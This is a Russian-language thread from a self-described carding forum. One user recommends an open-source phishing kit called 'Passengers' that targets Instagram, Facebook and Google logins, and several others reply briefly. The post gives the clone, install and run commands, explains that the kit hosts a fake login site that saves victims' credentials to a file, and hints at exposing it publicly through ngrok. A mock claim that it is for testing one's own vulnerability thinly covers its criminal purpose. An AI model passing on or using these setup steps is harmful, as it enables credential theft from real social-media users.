Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Вашему вниманию хороший фишинг социальных сетей

Torsten

Опытный user
Регистрация
7 Ноя 2021
Сообщения
961
Реакции
114
Недавно я наткнулся на неплохой фишинг инструмент "Пассажиры" для социальных сетей, а именно для (Instagram/Facebook/Google).
Да, все мы знаем, что сейчас много неплохих фишингов, но хочу отметить что этот с открытым кодом и простой работой, но в то же время очень хорошо работает.


И так речь о Passengers - универсальном фишинге соцсетей, чтобы понять собственную уязвимость :>, ну конечно .

Да, все мы знаем, что сейчас много неплохих фишингов, но хочу отметить что этот с открытым кодом и простой работой, но в то же время очень хорошо работает.

Инструмент Пасажири имеет очень простой главный интерфейс:

Png

Для установки досатоточно ввести :
git clone https://github.com/oldnum/passengers
cd passengers
pip3 install -r requirements.txt
python3 main.py

Изпользование:
И все, виберате нужний вам пунктик в меню, вводите порт , и теперь на вашем localhost весить фишинг сайт с записью даних в файл и отдельно отображение в терминале, само собой. Думаю не мне вам объяснять как юзать ngrok дальше
 

Xanthias

Опытный user
Регистрация
3 Апр 2021
Сообщения
802
Реакции
62
Спасибо, попробую.
 

22eee22

Опытный user
Регистрация
20 Ноя 2021
Сообщения
274
Реакции
17
Интересно, ловили когда нибудь фишеров?
 

smof

Опытный user
Регистрация
25 Апр 2022
Сообщения
221
Реакции
12
Норм, Лукас заслужил
 

Overrated

Опытный user
Регистрация
10 Мар 2022
Сообщения
780
Реакции
86
Где то видел уже такое, но пойдет.
 

LehaMirnbiy

Опытный user
Регистрация
5 Авг 2021
Сообщения
671
Реакции
14
Я уже видел такой скрипт.
 
Сверху Снизу